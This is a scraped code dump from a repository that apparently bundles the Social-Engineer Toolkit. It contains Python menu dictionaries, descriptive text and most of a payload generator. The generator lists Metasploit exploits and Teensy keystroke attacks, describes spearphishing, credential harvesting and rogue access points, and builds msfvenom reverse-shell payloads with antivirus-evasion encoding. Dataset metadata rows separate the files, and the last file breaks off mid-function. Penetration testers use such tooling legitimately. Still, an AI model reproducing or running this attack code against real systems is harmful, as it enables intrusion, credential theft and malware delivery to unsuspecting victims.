'7': "windows/meterpreter/reverse_https",
}.get(payload, "ERROR")
# uses create_payloads_menu
def ms_attacks(exploit):
""" Receives the input given by the user from create_payload.py """
return {
'1': "dll_hijacking",
'2': "unc_embed",
'3': "exploit/windows/fileformat/ms15_100_mcl_exe",
'4': "exploit/windows/fileformat/ms14_017_rtf",
'5': "exploit/windows/fileformat/ms11_006_createsizeddibsection",
'6': "exploit/windows/fileformat/ms10_087_rtf_pfragments_bof",
'7': "exploit/windows/fileformat/adobe_flashplayer_button",
'8': "exploit/windows/fileformat/adobe_cooltype_sing",
'9': "exploit/windows/fileformat/adobe_flashplayer_newfunction",
'10': "exploit/windows/fileformat/adobe_collectemailinfo",
'11': "exploit/windows/fileformat/adobe_geticon",
'12': "exploit/windows/fileformat/adobe_jbig2decode",
'13': "exploit/windows/fileformat/adobe_pdf_embedded_exe",
'14': "exploit/windows/fileformat/adobe_utilprintf",
'15': "custom/exe/to/vba/payload",
'16': "exploit/windows/fileformat/adobe_u3d_meshdecl",
'17': 'exploit/windows/fileformat/adobe_pdf_embedded_exe_nojs',
'18': "exploit/windows/fileformat/foxit_title_bof",
'19': "exploit/windows/fileformat/apple_quicktime_pnsize",
'20': "exploit/windows/fileformat/nuance_pdf_launch_overflow",
'21': "exploit/windows/fileformat/adobe_reader_u3d",
'22': "exploit/windows/fileformat/ms12_027_mscomctl_bof",
}.get(exploit, "INVALID")
def teensy_config(choice):
""" Receives the input given by the user from set.py """
return {
'1': "powershell_down.ino",
'2': "wscript.ino",
'3': "powershell_reverse.ino",
'4': "beef.ino",
'5': "java_applet.ino",
'6': "gnome_wget.ino"
}.get(choice, "ERROR")
def webattack_vector(attack_vector):
""" Receives the input given by the user from set.py """
return {
'1': "java",
'2': "browser",
'3': "harvester",
'4': "tabnapping",
'5': "webjacking",
'6': "multiattack",
}.get(attack_vector, "ERROR")
def category(category):
"""
Takes the value sent from the user encoding menu and returns
the actual value to be used.
"""
return {
'0': "0",
'1': "phishing",
'2': "webattack",
'3': "infectious",
'4': "payloads",
'5': "mailer",
'6': "arduino",
'7': "sms",
'8': "wireless",
'9': "modules",
'10': "cloner",
'11': "harvester",
'12': "tabnapping",
'13': "teensy",
'14': "binary2teensy",
'15': "dll_hijacking",
'16': "multiattack",
'17': "java_applet",
'18': "encoding",
'19': "fasttrack",
'20': "autopwn",
'21': "mssql",
'22': "scan",
'23': "direct",
'24': "exploits",
'25': "active_target",
'26': "shell",
'27': "set",
'28': "teensy2powershell",
'29': "powershell",
'30': "delldrac",
'31': "ridenum",
'32': "psexec",
}.get(category, "ERROR")
| 7,980 | Python | .py | 195 | 33.194872 | 73 | 0.606346 | CHEGEBB/africana-framework | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,285,844 | text.py | CHEGEBB_africana-framework/externals/set/src/core/menu/text.py | #!/usr/bin/env python3
########################################################################
#
# text menu for set menu stuff
#
########################################################################
from src.core.setcore import bcolors, get_version, check_os, meta_path
# grab version of SET
define_version = get_version()
# check operating system
operating_system = check_os()
# grab metasploit path
msf_path = meta_path()
PORT_NOT_ZERO = "Port cannot be zero!"
PORT_TOO_HIGH = "Let's stick with the LOWER 65,535 ports..."
main_text = " Select from the menu:\n"
main_menu = ['Social-Engineering Attacks',
'Penetration Testing (Fast-Track)',
'Third Party Modules',
'Update the Social-Engineer Toolkit',
'Update SET configuration',
'Help, Credits, and About']
main = ['Spear-Phishing Attack Vectors',
'Website Attack Vectors',
'Infectious Media Generator',
'Create a Payload and Listener',
'Mass Mailer Attack',
'Arduino-Based Attack Vector',
'Wireless Access Point Attack Vector',
'QRCode Generator Attack Vector',
'Powershell Attack Vectors',
'Third Party Modules']
spearphish_menu = ['Perform a Mass Email Attack',
'Create a FileFormat Payload',
'Create a Social-Engineering Template',
'0D']
spearphish_text = ("""
The """ + bcolors.BOLD + """Spearphishing""" + bcolors.ENDC + """ module allows you to specially craft email messages and send
them to a large (or small) number of people with attached fileformat malicious
payloads. If you want to spoof your email address, be sure "Sendmail" is in-
stalled (apt-get install sendmail) and change the config/set_config SENDMAIL=OFF
flag to SENDMAIL=ON.
There are two options, one is getting your feet wet and letting SET do
everything for you (option 1), the second is to create your own FileFormat
payload and use it in your own attack. Either way, good luck and enjoy!
""")
webattack_menu = ['Java Applet Attack Method',
'Metasploit Browser Exploit Method',
'Credential Harvester Attack Method',
'Tabnabbing Attack Method',
'Web Jacking Attack Method',
'Multi-Attack Web Method',
'HTA Attack Method',
'0D']
fasttrack_menu = ['Microsoft SQL Bruter',
'Custom Exploits',
'SCCM Attack Vector',
'Dell DRAC/Chassis Default Checker',
'RID_ENUM - User Enumeration Attack',
'PSEXEC Powershell Injection',
'0D']
fasttrack_text = ("""
Welcome to the Social-Engineer Toolkit - """ + bcolors.BOLD + """Fast-Track Penetration Testing platform""" + bcolors.ENDC + """. These attack vectors
have a series of exploits and automation aspects to assist in the art of penetration testing. SET
now incorporates the attack vectors leveraged in Fast-Track. All of these attack vectors have been
completely rewritten and customized from scratch as to improve functionality and capabilities.
""")
fasttrack_exploits_menu1 = ['MS08-067 (Win2000, Win2k3, WinXP)',
'Mozilla Firefox 3.6.16 mChannel Object Use After Free Exploit (Win7)',
'Solarwinds Storage Manager 5.1.0 Remote SYSTEM SQL Injection Exploit',
'RDP | Use after Free - Denial of Service',
'MySQL Authentication Bypass Exploit',
'F5 Root Authentication Bypass Exploit',
'0D']
fasttrack_exploits_text1 = ("""
Welcome to the Social-Engineer Toolkit - Fast-Track Penetration Testing """ + bcolors.BOLD + """Exploits Section""" + bcolors.ENDC + """. This
menu has obscure exploits and ones that are primarily python driven. This will continue to grow over time.
""")
fasttrack_mssql_menu1 = ['Scan and Attack MSSQL',
'Connect directly to MSSQL',
'0D']
fasttrack_mssql_text1 = ("""
Welcome to the Social-Engineer Toolkit - Fast-Track Penetration Testing """ + bcolors.BOLD + """Microsoft SQL Brute Forcer""" + bcolors.ENDC + """. This
attack vector will attempt to identify live MSSQL servers and brute force the weak account passwords that
may be found. If that occurs, SET will then compromise the affected system by deploying a binary to
hexadecimal attack vector which will take a raw binary, convert it to hexadecimal and use a staged approach
in deploying the hexadecimal form of the binary onto the underlying system. At this point, a trigger will occur
to convert the payload back to a binary for us.
""")
webattack_text = ("""
The Web Attack module is a unique way of utilizing multiple web-based attacks in order to compromise the intended victim.
The """ + bcolors.BOLD + """Java Applet Attack""" + bcolors.ENDC + """ method will spoof a Java Certificate and deliver a metasploit based payload. Uses a customized java applet created by Thomas Werth to deliver the payload.
The """ + bcolors.BOLD + """Metasploit Browser Exploit""" + bcolors.ENDC + """ method will utilize select Metasploit browser exploits through an iframe and deliver a Metasploit payload.
The """ + bcolors.BOLD + """Credential Harvester""" + bcolors.ENDC + """ method will utilize web cloning of a web- site that has a username and password field and harvest all the information posted to the website.
The """ + bcolors.BOLD + """TabNabbing""" + bcolors.ENDC + """ method will wait for a user to move to a different tab, then refresh the page to something different.
The """ + bcolors.BOLD + """Web-Jacking Attack""" + bcolors.ENDC + """ method was introduced by white_sheep, emgent. This method utilizes iframe replacements to make the highlighted URL link to appear legitimate however when clicked a window pops up then is replaced with the malicious link. You can edit the link replacement settings in the set_config if its too slow/fast.
The """ + bcolors.BOLD + """Multi-Attack""" + bcolors.ENDC + """ method will add a combination of attacks through the web attack menu. For example you can utilize the Java Applet, Metasploit Browser, Credential Harvester/Tabnabbing all at once to see which is successful.
The """ + bcolors.BOLD + """HTA Attack""" + bcolors.ENDC + """ method will allow you to clone a site and perform powershell injection through HTA files which can be used for Windows-based powershell exploitation through the browser.
""")
webattack_vectors_menu = ['Web Templates',
'Site Cloner',
'Custom Import\n',
]
webattack_vectors_text = ("""
The first method will allow SET to import a list of pre-defined web
applications that it can utilize within the attack.
The second method will completely clone a website of your choosing
and allow you to utilize the attack vectors within the completely
same web application you were attempting to clone.
The third method allows you to import your own website, note that you
should only have an index.html when using the import website
functionality.
""")
teensy_menu = ['Powershell HTTP GET MSF Payload',
'WSCRIPT HTTP GET MSF Payload',
'Powershell based Reverse Shell Payload',
'Internet Explorer/FireFox Beef Jack Payload',
'Go to malicious java site and accept applet Payload',
'Gnome wget Download Payload',
'Binary 2 Teensy Attack (Deploy MSF payloads)',
'SDCard 2 Teensy Attack (Deploy Any EXE)',
'SDCard 2 Teensy Attack (Deploy on OSX)',
'X10 Arduino Sniffer PDE and Libraries',
'X10 Arduino Jammer PDE and Libraries',
'Powershell Direct ShellCode Teensy Attack',
'Peensy Multi Attack Dip Switch + SDCard Attack',
'HID Msbuild compile to memory Shellcode Attack',
'0D']
teensy_text = ("""
The """ + bcolors.BOLD + """Arduino-Based Attack""" + bcolors.ENDC + """ Vector utilizes the Arduin-based device to
program the device. You can leverage the Teensy's, which have onboard
storage and can allow for remote code execution on the physical
system. Since the devices are registered as USB Keyboard's it
will bypass any autorun disabled or endpoint protection on the
system.
You will need to purchase the Teensy USB device; it's roughly
$22. This attack vector will auto-generate the code
needed in order to deploy the payload on the system for you.
This attack vector will create the .pde files necessary to import
into Arduino (the IDE used for programming the Teensy). The attack
vectors range from Powershell based downloaders, wscript attacks,
and other methods.
For more information on specifications and good tutorials visit:
http://www.irongeek.com/i.php?page=security/programmable-hid-usb-keystroke-dongle
To purchase a Teensy, visit: http://www.pjrc.com/store/teensy.html
Special thanks to: IronGeek, WinFang, and Garland
This attack vector also attacks X10 based controllers, be sure to be leveraging
X10 based communication devices in order for this to work.
Select a payload to create the pde file to import into Arduino:
""")
wireless_attack_menu = ['Start the SET Wireless Attack Vector Access Point',
'Stop the SET Wireless Attack Vector Access Point',
'0D']
wireless_attack_text = """
The """ + bcolors.BOLD + """Wireless Attack""" + bcolors.ENDC + """ module will create an access point leveraging your
wireless card and redirect all DNS queries to you. The concept is fairly
simple, SET will create a wireless access point, dhcp server, and spoof
DNS to redirect traffic to the attacker machine. It will then exit out
of that menu with everything running as a child process.
You can then launch any SET attack vector you want, for example the Java
Applet attack and when a victim joins your access point and tries going to
a website, will be redirected to your attacker machine.
This attack vector requires AirBase-NG, AirMon-NG, DNSSpoof, and dhcpd3.
"""
infectious_menu = ['File-Format Exploits',
'Standard Metasploit Executable',
'0D']
infectious_text = """
The """ + bcolors.BOLD + bcolors.GREEN + """Infectious """ + bcolors.ENDC + """USB/CD/DVD module will create an autorun.inf file and a
Metasploit payload. When the DVD/USB/CD is inserted, it will automatically
run if autorun is enabled.""" + bcolors.ENDC + """
Pick the attack vector you wish to use: fileformat bugs or a straight executable.
"""
# used in create_payloads.py
if operating_system != "windows":
if msf_path != False:
payload_menu_1 = [
'Meterpreter Memory Injection (DEFAULT) This will drop a meterpreter payload through powershell injection',
'Meterpreter Multi-Memory Injection This will drop multiple Metasploit payloads via powershell injection',
'SE Toolkit Interactive Shell Custom interactive reverse toolkit designed for SET',
'SE Toolkit HTTP Reverse Shell Purely native HTTP shell with AES encryption support',
'RATTE HTTP Tunneling Payload Security bypass payload that will tunnel all comms over HTTP',
'ShellCodeExec Alphanum Shellcode This will drop a meterpreter payload through shellcodeexec',
'Import your own executable Specify a path for your own executable',
'Import your own commands.txt Specify payloads to be sent via command line\n']
if operating_system == "windows" or msf_path == False:
payload_menu_1 = [
'SE Toolkit Interactive Shell Custom interactive reverse toolkit designed for SET',
'SE Toolkit HTTP Reverse Shell Purely native HTTP shell with AES encryption support',
'RATTE HTTP Tunneling Payload Security bypass payload that will tunnel all comms over HTTP\n']
payload_menu_1_text = """
What payload do you want to generate:
Name: Description:
"""
# used in gen_payload.py
payload_menu_2 = [
'Windows Shell Reverse_TCP Spawn a command shell on victim and send back to attacker',
'Windows Reverse_TCP Meterpreter Spawn a meterpreter shell on victim and send back to attacker',
'Windows Reverse_TCP VNC DLL Spawn a VNC server on victim and send back to attacker',
'Windows Shell Reverse_TCP X64 Windows X64 Command Shell, Reverse TCP Inline',
'Windows Meterpreter Reverse_TCP X64 Connect back to the attacker (Windows x64), Meterpreter',
'Windows Meterpreter Egress Buster Spawn a meterpreter shell and find a port home via multiple ports',
'Windows Meterpreter Reverse HTTPS Tunnel communication over HTTP using SSL and use Meterpreter',
'Windows Meterpreter Reverse DNS Use a hostname instead of an IP address and use Reverse Meterpreter',
'Download/Run your Own Executable Downloads an executable and runs it\n'
]
payload_menu_2_text = """\n"""
payload_menu_3_text = ""
payload_menu_3 = [
'Windows Reverse TCP Shell Spawn a command shell on victim and send back to attacker',
'Windows Meterpreter Reverse_TCP Spawn a meterpreter shell on victim and send back to attacker',
'Windows Reverse VNC DLL Spawn a VNC server on victim and send back to attacker',
'Windows Reverse TCP Shell (x64) Windows X64 Command Shell, Reverse TCP Inline',
'Windows Meterpreter Reverse_TCP (X64) Connect back to the attacker (Windows x64), Meterpreter',
'Windows Shell Bind_TCP (X64) Execute payload and create an accepting port on remote system',
'Windows Meterpreter Reverse HTTPS Tunnel communication over HTTP using SSL and use Meterpreter\n']
# called from create_payload.py associated dictionary = ms_attacks
create_payloads_menu = [
'SET Custom Written DLL Hijacking Attack Vector (RAR, ZIP)',
'SET Custom Written Document UNC LM SMB Capture Attack',
'MS15-100 Microsoft Windows Media Center MCL Vulnerability',
'MS14-017 Microsoft Word RTF Object Confusion (2014-04-01)',
'Microsoft Windows CreateSizedDIBSECTION Stack Buffer Overflow',
'Microsoft Word RTF pFragments Stack Buffer Overflow (MS10-087)',
'Adobe Flash Player "Button" Remote Code Execution',
'Adobe CoolType SING Table "uniqueName" Overflow',
'Adobe Flash Player "newfunction" Invalid Pointer Use',
'Adobe Collab.collectEmailInfo Buffer Overflow',
'Adobe Collab.getIcon Buffer Overflow',
'Adobe JBIG2Decode Memory Corruption Exploit',
'Adobe PDF Embedded EXE Social Engineering',
'Adobe util.printf() Buffer Overflow',
'Custom EXE to VBA (sent via RAR) (RAR required)',
'Adobe U3D CLODProgressiveMeshDeclaration Array Overrun',
'Adobe PDF Embedded EXE Social Engineering (NOJS)',
'Foxit PDF Reader v4.1.1 Title Stack Buffer Overflow',
'Apple QuickTime PICT PnSize Buffer Overflow',
'Nuance PDF Reader v6.0 Launch Stack Buffer Overflow',
'Adobe Reader u3D Memory Corruption Vulnerability',
'MSCOMCTL ActiveX Buffer Overflow (ms12-027)\n']
create_payloads_text = """
Select the file format exploit you want.
The default is the PDF embedded EXE.\n
********** PAYLOADS **********\n"""
browser_exploits_menu = [
'Adobe Flash Player ByteArray Use After Free (2015-07-06)',
'Adobe Flash Player Nellymoser Audio Decoding Buffer Overflow (2015-06-23)',
'Adobe Flash Player Drawing Fill Shader Memory Corruption (2015-05-12)',
'MS14-012 Microsoft Internet Explorer TextRange Use-After-Free (2014-03-11)',
'MS14-012 Microsoft Internet Explorer CMarkup Use-After-Free (2014-02-13)',
'Internet Explorer CDisplayPointer Use-After-Free (10/13/2013)',
    'Microsoft Internet Explorer SetMouseCapture Use-After-Free (09/17/2013)',
'Java Applet JMX Remote Code Execution (UPDATED 2013-01-19)',
'Java Applet JMX Remote Code Execution (2013-01-10)',
    'MS13-009 Microsoft Internet Explorer SLayoutRun Use-After-Free (2013-02-13)',
'Microsoft Internet Explorer CDwnBindInfo Object Use-After-Free (2012-12-27)',
'Java 7 Applet Remote Code Execution (2012-08-26)',
'Microsoft Internet Explorer execCommand Use-After-Free Vulnerability (2012-09-14)',
'Java AtomicReferenceArray Type Violation Vulnerability (2012-02-14)',
'Java Applet Field Bytecode Verifier Cache Remote Code Execution (2012-06-06)',
'MS12-037 Internet Explorer Same ID Property Deleted Object Handling Memory Corruption (2012-06-12)',
'Microsoft XML Core Services MSXML Uninitialized Memory Corruption (2012-06-12)',
'Adobe Flash Player Object Type Confusion (2012-05-04)',
'Adobe Flash Player MP4 "cprt" Overflow (2012-02-15)',
'MS12-004 midiOutPlayNextPolyEvent Heap Overflow (2012-01-10)',
'Java Applet Rhino Script Engine Remote Code Execution (2011-10-18)',
'MS11-050 IE mshtml!CObjectElement Use After Free (2011-06-16)',
'Adobe Flash Player 10.2.153.1 SWF Memory Corruption Vulnerability (2011-04-11)',
'Cisco AnyConnect VPN Client ActiveX URL Property Download and Execute (2011-06-01)',
'Internet Explorer CSS Import Use After Free (2010-11-29)',
'Microsoft WMI Administration Tools ActiveX Buffer Overflow (2010-12-21)',
'Internet Explorer CSS Tags Memory Corruption (2010-11-03)',
'Sun Java Applet2ClassLoader Remote Code Execution (2011-02-15)',
'Sun Java Runtime New Plugin docbase Buffer Overflow (2010-10-12)',
'Microsoft Windows WebDAV Application DLL Hijacker (2010-08-18)',
'Adobe Flash Player AVM Bytecode Verification Vulnerability (2011-03-15)',
'Adobe Shockwave rcsL Memory Corruption Exploit (2010-10-21)',
'Adobe CoolType SING Table "uniqueName" Stack Buffer Overflow (2010-09-07)',
'Apple QuickTime 7.6.7 Marshaled_pUnk Code Execution (2010-08-30)',
'Microsoft Help Center XSS and Command Execution (2010-06-09)',
'Microsoft Internet Explorer iepeers.dll Use After Free (2010-03-09)',
'Microsoft Internet Explorer "Aurora" Memory Corruption (2010-01-14)',
'Microsoft Internet Explorer Tabular Data Control Exploit (2010-03-0)',
'Microsoft Internet Explorer 7 Uninitialized Memory Corruption (2009-02-10)',
'Microsoft Internet Explorer Style getElementsbyTagName Corruption (2009-11-20)',
'Microsoft Internet Explorer isComponentInstalled Overflow (2006-02-24)',
'Microsoft Internet Explorer Data Binding Corruption (2008-12-07)',
'Microsoft Internet Explorer Unsafe Scripting Misconfiguration (2010-09-20)',
'FireFox 3.5 escape Return Value Memory Corruption (2009-07-13)',
'FireFox 3.6.16 mChannel use after free vulnerability (2011-05-10)',
'Metasploit Browser Autopwn (USE AT OWN RISK!)\n']
browser_exploits_text = """
Enter the browser exploit you would like to use [8]:
"""
# this is for the powershell attack vectors
powershell_menu = ['Powershell Alphanumeric Shellcode Injector',
'Powershell Reverse Shell',
'Powershell Bind Shell',
'Powershell Dump SAM Database',
'0D']
powershell_text = ("""
The """ + bcolors.BOLD + """Powershell Attack Vector""" + bcolors.ENDC + """ module allows you to create PowerShell specific attacks. These attacks will allow you to use PowerShell which is available by default in all operating systems Windows Vista and above. PowerShell provides a fruitful landscape for deploying payloads and performing functions that do not get triggered by preventative technologies.\n""")
encoder_menu = ['shikata_ga_nai',
'No Encoding',
'Multi-Encoder',
'Backdoored Executable\n']
encoder_text = """
Select one of the options below; 'Backdoored Executable' is typically the best choice.
However, most payloads are still picked up by AV, so you may need additional
packing/crypting to get around basic AV detection.
"""
dll_hijacker_text = """
The DLL Hijacker vulnerability allows normal file extensions to
call local (or remote) .dll files, which can then call your payload or
executable. In this scenario the attack is packed into a zip file;
when the user opens a file with the targeted extension, it triggers the
dll and ultimately our payload. At the time of this release, all of these
file extensions were tested, appear to work, and are not patched. This
list will be updated continuously as time goes on.
"""
fakeap_dhcp_menu = ['10.0.0.100-254',
'192.168.10.100-254\n']
fakeap_dhcp_text = "Please choose which DHCP Config you would like to use: "
| 20,888 | Python | .py | 323 | 58.182663 | 413 | 0.704152 | CHEGEBB/africana-framework | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,285,845 | create_payloads.py | CHEGEBB_africana-framework/externals/set/src/core/payloadgen/create_payloads.py | #!/usr/bin/env python3
# Import modules
import subprocess
import time
import sys
import os
import re
import socket
import base64
import shutil
from src.core.setcore import *
from src.core.menu.text import *
from src.core.dictionaries import *
try:
if len(check_options("IPADDR=")) > 2:
ipaddr = check_options("IPADDR=")
else:
ipaddr = ""
except:
ipaddr = ""
me = mod_name()
listener = "notdefined"
definepath = os.getcwd()
sys.path.append(definepath)
port1 = "8080"
port2 = "8081"
operating_system = check_os()
# check stage encoding - shikata ga nai for payload delivery
stage_encoding = check_config("STAGE_ENCODING=").lower()
if stage_encoding == "off":
stage_encoding = "false"
else:
stage_encoding = "true"
configfile = open("/etc/setoolkit/set.config", "r").readlines()
# check the metasploit path
msf_path = meta_path()
# check the config files for all of the flags needed for the file
auto_migrate = check_config("AUTO_MIGRATE=")
meterpreter_multi = check_config("METERPRETER_MULTI_SCRIPT=")
linux_meterpreter_multi = check_config("LINUX_METERPRETER_MULTI_SCRIPT=")
meterpreter_multi_command = check_config("METERPRETER_MULTI_COMMANDS=")
meterpreter_multi_command = meterpreter_multi_command.replace(";", "\n")
linux_meterpreter_multi_command = check_config("LINUX_METERPRETER_MULTI_COMMANDS=")
linux_meterpreter_multi_command = linux_meterpreter_multi_command.replace(";", "\n")
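# Illustrative config example (command names are placeholders): a line such as
#   METERPRETER_MULTI_COMMANDS=getuid;sysinfo;screenshot
# in set.config becomes one command per line after the replace above, and is later
# written into the multiscript resource file handed to the Metasploit handler.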
unc_embed = check_config("UNC_EMBED=")
attack_vector = 0
linosx = 0
multiattack = ""
# grab attack vector
if os.path.isfile(userconfigpath + "attack_vector"):
fileopen = open(userconfigpath + "attack_vector", "r")
for line in fileopen:
line = line.rstrip()
if line == "java":
attack_vector = "java"
if line == "multiattack":
attack_vector = "multiattack"
multiattack = open(userconfigpath + "multi_payload", "w")
# here is a place holder for the multi attack java
# multiattack outputs a file called multi_java if
# this file is present it will allow additional
# functionality
multiattack_java = "off"
if os.path.isfile(userconfigpath + "multi_java"):
multiattack_java = "on"
# custom payloadgen
payloadgen = "regular"
if os.path.isfile(userconfigpath + "payloadgen"):
payloadgen = "solo"
#
# grab ipaddr if it hasn't been identified yet
#
if check_options("IPADDR=") == False:
fileopen = open("/etc/setoolkit/set.config", "r")
data = fileopen.read()
match = re.search("AUTO_DETECT=ON", data)
if match:
try:
ipaddr = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
ipaddr.connect(('google.com', 0))
ipaddr.settimeout(2)
ipaddr = ipaddr.getsockname()[0]
update_options("IPADDR=" + ipaddr)
except Exception as e:
log(e)
ipaddr = raw_input(
setprompt(["4"], "IP address for the payload listener (LHOST)"))
update_options("IPADDR=" + ipaddr)
# if AUTO_DETECT=OFF prompt for IP Address
match = re.search("AUTO_DETECT=OFF", data)
if match:
ipaddr = raw_input(
setprompt(["4"], "Enter the IP address for the payload (reverse)"))
update_options("IPADDR=" + ipaddr)
# payload selection here
try:
# Specify path to metasploit
path = msf_path
# Specify payload
# this is encoding
encode = ""
# this is payload
choice1 = ""
# this is port
choice3 = ""
if os.path.isfile(userconfigpath + "meterpreter_reverse_tcp_exe"):
fileopen = open(userconfigpath + "meterpreter_reverse_tcp_exe", "r")
for line in fileopen:
# this reads in the first line of the file which happens to be port
# when calling through core
choice3 = line.rstrip()
# change attack_vector to nothing
attack_vector = ""
# specify payload
choice1 = "windows/meterpreter/reverse_tcp"
# encode using backdoored executable
encode = "16"
# if we don't trigger on the standard core api call
if choice1 == "":
#
# USER INPUT: SHOW PAYLOAD MENU 1 #
#
debug_msg(me, "printing 'text.payload_menu_1'", 5)
show_payload_menu1 = create_menu(payload_menu_1_text, payload_menu_1)
choice1 = raw_input(setprompt(["4"], ""))
# default blank then select pyinjector
if choice1 == "":
choice1 = "1"
# check the length and make sure it works
if choice1 != "":
choice1 = check_length(choice1, 8)
# convert it to a string
choice1 = str(choice1)
custom = 0
counter = 0
flag = 0
encode_stop = 0
# Condition testing of 'choice1'
# Will use a dictionary list
if choice1 == "exit":
exit_set()
if choice1 == '':
choice1 = ("1")
if choice1 == '5' or choice1 == '6' or choice1 == '7':
encode_stop = 1
encode = ""
if choice1 == '7':
flag = 1
# here we specify shellcodeexec
if choice1 == '1' or choice1 == '2' or choice1 == '6' or choice1 == '8':
encode_stop = 1
encode = 0
# 11 is the set interactive shell, 12 is set rev http shell and 13 is
# ratte listener
if choice1 == '3' or choice1 == '4' or choice1 == "5":
encoder = 'false'
payloadgen = 'solo'
encode_stop = 1
filewrite = open(userconfigpath + "set.payload", "w")
# select setshell
if choice1 == '3':
filewrite.write("SETSHELL")
# select setshell_reverse
if choice1 == '4':
filewrite.write("SETSHELL_HTTP")
# select ratte
if choice1 == '5':
filewrite.write("RATTE")
filewrite.close()
if choice1 != "7":
# if not then import the payload selection
choice1 = ms_payload_2(choice1)
# don't do courtesy shell
if counter == 0:
courtesyshell = ("")
# if custom
if choice1 == '7':
print_info("Example: /root/custom.exe")
choice1 = raw_input(setprompt(["4"], "Enter the path to your executable"))
if not os.path.isfile(choice1):
while 1:
print_error("ERROR:File not found. Try Again.")
choice1 = raw_input(setprompt(["4"], "Enter the path to your executable"))
if os.path.isfile(choice1): break
update_options("CUSTOM_EXE=%s" % (choice1))
custom = 1
# if we are using our own executable
if custom == 1:
check_write = open(userconfigpath + "custom.exe", "w")
check_write.write("VALID")
check_write.close()
shutil.copyfile("%s" % (choice1), "msf.exe")
shutil.copyfile("msf.exe", userconfigpath + "msf.exe")
# Specify Encoding Option
encoder = "false"
if choice1 == "cmd/multi": update_options("CUSTOM_EXE=CMD/MULTI")
# if we aren't using the set shell
if choice1 != "set/reverse_shell":
# we need to rewrite index.html real quick because it has a parameter
# that could get confusing
if os.path.isfile(userconfigpath + "web_clone/index.html"):
fileopen = open(userconfigpath + "web_clone/index.html", "r")
data = fileopen.read()
data = data.replace("freehugs", "")
os.remove(userconfigpath + "web_clone/index.html")
filewrite = open(userconfigpath + "web_clone/index.html", "w")
filewrite.write(data)
filewrite.close()
# Specify Remote Host if ipaddr.file is missing (should never get here)
if check_options("IPADDR=") == 0:
choice2 = raw_input(setprompt(
["4"], "IP Address of the listener/attacker (reverse) or host/victim (bind shell)"))
update_options("IPADDR=" + choice2)
choice2 = check_options("IPADDR=")
# specify the port for the listener
if choice3 == "":
if choice1 != "shellcode/multipyinject":
if choice1 != "cmd/multi":
if custom == 0:
choice3 = raw_input(setprompt(["4"], "PORT of the listener [443]"))
# here we check if the user really wants to use port 80
if choice3 == "80":
print_warning(
"WARNING: SET Web Server requires port 80 to listen.")
print_warning(
"WARNING: Are you sure you want to proceed with port 80?")
port_choice_option = raw_input(
"\nDo you want to keep port 80? [y/n]")
if port_choice_option == "n":
# reprompt it
choice3 = raw_input(setprompt(["4"], "PORT of listener [443]"))
if choice3 == '':
choice3 = '443'
# this is needed for the set_payload
update_options("PORT=" + choice3)
# if we are using the SET interactive shell then do this
if choice1 == "set/reverse_shell":
encoder = "false"
filewrite = open(userconfigpath + "set.payload.posix", "w")
filewrite.write("true")
filewrite.close()
import src.core.payloadprep
# if were using the multiattack option
if attack_vector == "multiattack":
multiattack.write("MAIN=" + str(choice3) + "\n")
multiattack.write("MAINPAYLOAD=" + str(choice1) + "\n")
# if encoding is required, it will place 1msf.exe first then encode it
# to msf.exe
if encoder == "true":
choice4 = ("raw")
msf_filename = ("1msf.exe")
if encoder == "false":
choice4 = ("exe")
msf_filename = ("msf.exe")
# set choice to blank for ALL PORTS scan
if flag == 0:
portnum = "LPORT=" + choice3
if flag == 1:
portnum = ""
if encode != "BACKDOOR":
# if we aren't using the set reverse shell
if choice1 != "set/reverse_shell":
# if we are using shellcodeexec
if choice1 == "shellcode/alphanum" or choice1 == "shellcode/pyinject" or choice1 == "shellcode/multipyinject":
if choice1 == "shellcode/alphanum" or choice1 == "shellcode/pyinject":
print ("\nSelect the payload you want to deliver via shellcode injection\n\n 1) Windows Meterpreter Reverse TCP\n 2) Windows Meterpreter (Reflective Injection), Reverse HTTPS Stager\n 3) Windows Meterpreter (Reflective Injection) Reverse HTTP Stager\n 4) Windows Meterpreter (ALL PORTS) Reverse TCP\n")
# select payload
choice9 = raw_input(setprompt(["4"], "Enter the number for the payload [meterpreter_reverse_https]"))
# select default meterpreter reverse tcp
if choice9 == "":
choice9 = "windows/meterpreter/reverse_https"
if choice9 == "1":
choice9 = "windows/meterpreter/reverse_tcp"
# select reverse https
if choice9 == "2":
choice9 = "windows/meterpreter/reverse_https"
# select reverse http
if choice9 == "3":
choice9 = "windows/meterpreter/reverse_http"
# select all ports
if choice9 == "4":
choice9 = "windows/meterpreter/reverse_tcp_allports"
if ipaddr == "":
# grab ipaddr if not defined
ipaddr = check_options("IPADDR=")
if choice1 == "shellcode/alphanum":
print_status("Generating the payload via msfvenom and generating alphanumeric shellcode...")
subprocess.Popen("%smsfvenom -p %s LHOST=%s %s StagerURILength=5 StagerVerifySSLCert=false -e EXITFUNC=thread -e x86/alpha_mixed --format raw BufferRegister=EAX > %s/meterpreter.alpha_decoded" % (meta_path(), choice9, choice2, portnum, userconfigpath), shell=True).wait()
if choice1 == "shellcode/pyinject" or choice1 == "shellcode/multipyinject" or choice1 == "cmd/multi":
# here we update set options to specify pyinjection and multipy
update_options("PYINJECTION=ON")
# define, this will eventually be all of our payloads
multipyinject_payload = ""
# clean up old file
if os.path.isfile("%s/meta_config_multipyinjector" % (userconfigpath)):
os.remove("%s/meta_config_multipyinjector" % (userconfigpath))
# remove any old payload options
if os.path.isfile(userconfigpath + "payload.options.shellcode"):
os.remove(userconfigpath + "payload_options.shellcode")
# this is the file that gets saved with the payload and
# port options
if choice1 != "cmd/multi": payload_options = open(userconfigpath + "payload_options.shellcode", "a")
while 1:
# don't need any options here
if choice1 == "cmd/multi": break
if choice1 == "shellcode/multipyinject":
print ("\nSelect the payload you want to deliver via shellcode injection\n\n 1) Windows Meterpreter Reverse TCP\n 2) Windows Meterpreter (Reflective Injection), Reverse HTTPS Stager\n 3) Windows Meterpreter (Reflective Injection) Reverse HTTP Stager\n 4) Windows Meterpreter (ALL PORTS) Reverse TCP\n 5) Windows Reverse Command Shell\n 6) I'm finished adding payloads.\n")
choice9 = raw_input(
setprompt(["4"], "Enter the number for the payload [meterpreter_reverse_tcp]"))
# select default meterpreter reverse tcp
if choice9 == "" or choice9 == "1":
choice9 = "windows/meterpreter/reverse_tcp"
# select reverse https
if choice9 == "2":
choice9 = "windows/meterpreter/reverse_https"
# select reverse http
if choice9 == "3":
